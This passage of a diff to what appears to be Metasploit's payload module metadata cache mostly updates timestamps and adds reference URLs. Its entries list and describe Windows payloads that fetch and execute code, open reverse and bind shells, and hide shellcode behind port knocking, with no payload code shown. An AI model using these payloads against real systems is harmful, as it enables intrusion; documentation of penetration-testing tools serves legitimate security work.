-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/meterpreter_reverse_http",
@@ -190020,7 +192971,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/meterpreter_reverse_https",
@@ -190061,7 +193012,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/meterpreter_reverse_ipv6_tcp",
@@ -190102,7 +193053,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/meterpreter_reverse_tcp",
@@ -190134,7 +193085,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from an http server.\n\nListen for an IPv6 connection (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -190142,7 +193093,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/peinject/bind_ipv6_tcp",
@@ -190177,7 +193128,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from an http server.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -190185,7 +193136,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/peinject/bind_ipv6_tcp_uuid",
@@ -190219,7 +193170,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from an http server.\n\nListen for a pipe connection (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -190227,7 +193178,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/peinject/bind_named_pipe",
@@ -190261,7 +193212,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from an http server.\n\nListen for a connection (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -190269,7 +193220,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/peinject/bind_tcp",
@@ -190308,7 +193259,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -190316,7 +193267,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/peinject/bind_tcp_rc4",
@@ -190351,7 +193302,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from an http server.\n\nListen for a connection with UUID Support (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -190359,7 +193310,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/peinject/bind_tcp_uuid",
@@ -190393,7 +193344,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker via a named pipe pivot",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -190401,7 +193352,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/peinject/reverse_named_pipe",
@@ -190435,7 +193386,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -190443,7 +193394,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/peinject/reverse_tcp",
@@ -190482,7 +193433,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -190490,7 +193441,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/peinject/reverse_tcp_rc4",
@@ -190525,7 +193476,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from an http server.\n\nConnect back to the attacker with UUID Support (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -190533,7 +193484,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/peinject/reverse_tcp_uuid",
@@ -190574,7 +193525,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/pingback_reverse_tcp",
@@ -190615,7 +193566,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/powershell_bind_tcp",
@@ -190656,7 +193607,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/powershell_reverse_tcp",
@@ -190697,7 +193648,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/powershell_reverse_tcp_ssl",
@@ -190736,7 +193687,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/shell/bind_ipv6_tcp",
@@ -190778,7 +193729,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/shell/bind_ipv6_tcp_uuid",
@@ -190820,7 +193771,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/shell/bind_named_pipe",
@@ -190861,7 +193812,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/shell/bind_tcp",
@@ -190907,7 +193858,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/shell/bind_tcp_rc4",
@@ -190949,7 +193900,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/shell/bind_tcp_uuid",
@@ -190990,7 +193941,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/shell/reverse_tcp",
@@ -191036,7 +193987,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/shell/reverse_tcp_rc4",
@@ -191078,7 +194029,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/shell/reverse_tcp_uuid",
@@ -191119,7 +194070,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/shell_bind_tcp",
@@ -191158,7 +194109,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/shell_reverse_tcp",
@@ -191198,7 +194149,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/vncinject/bind_ipv6_tcp",
@@ -191241,7 +194192,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/vncinject/bind_ipv6_tcp_uuid",
@@ -191284,7 +194235,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/vncinject/bind_named_pipe",
@@ -191326,7 +194277,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/vncinject/bind_tcp",
@@ -191373,7 +194324,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/vncinject/bind_tcp_rc4",
@@ -191416,7 +194367,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/vncinject/bind_tcp_uuid",
@@ -191459,7 +194410,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/vncinject/reverse_http",
@@ -191504,7 +194455,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/vncinject/reverse_https",
@@ -191546,7 +194497,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/vncinject/reverse_tcp",
@@ -191593,7 +194544,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/vncinject/reverse_tcp_rc4",
@@ -191636,7 +194587,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/vncinject/reverse_tcp_uuid",
@@ -191679,7 +194630,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/vncinject/reverse_winhttp",
@@ -191722,7 +194673,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-03-15 19:19:19 +0000",
+    "mod_time": "2023-07-31 16:38:09 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/http/x64/vncinject/reverse_winhttps",
@@ -193434,7 +196385,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from an https server.\n\nListen for an IPv6 connection (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -193477,7 +196428,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from an https server.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -193519,7 +196470,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from an https server.\n\nListen for a pipe connection (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -193561,7 +196512,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from an https server.\n\nListen for a connection (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -193608,7 +196559,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -193651,7 +196602,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from an https server.\n\nListen for a connection with UUID Support (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -193693,7 +196644,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker via a named pipe pivot",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -193735,7 +196686,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -193782,7 +196733,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -193825,7 +196776,7 @@
    ],
    "description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker with UUID Support (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -195140,7 +198091,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -195185,7 +198136,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -196358,7 +199309,8 @@
    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
-      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
+      "URL-https://github.com/rapid7/ReflectiveDLLInjection",
+      "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -196403,7 +199355,8 @@
    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
-      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
+      "URL-https://github.com/rapid7/ReflectiveDLLInjection",
+      "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -197695,7 +200648,8 @@
    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
-      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
+      "URL-https://github.com/rapid7/ReflectiveDLLInjection",
+      "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -197741,7 +200695,8 @@
    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
-      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
+      "URL-https://github.com/rapid7/ReflectiveDLLInjection",
+      "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -199000,7 +201955,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -199045,7 +202000,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -199840,7 +202795,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -199885,7 +202840,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -200680,7 +203635,8 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber",
+      "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -200725,7 +203681,8 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber",
+      "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -200769,7 +203726,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x86)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -200814,7 +203771,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x86)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -200856,7 +203813,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x86)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -200898,7 +203855,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (No NX)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -200942,7 +203899,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (Windows x86)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -200988,7 +203945,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -201031,7 +203988,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x86)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -201073,7 +204030,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nUse an established connection",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -201117,7 +204074,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker over IPv6",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -201159,7 +204116,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker via a named pipe pivot",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -201201,7 +204158,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker (No NX)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -201243,7 +204200,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -201287,7 +204244,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -201331,7 +204288,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -201376,7 +204333,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "cmd",
@@ -201422,7 +204379,7 @@
    ],
    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
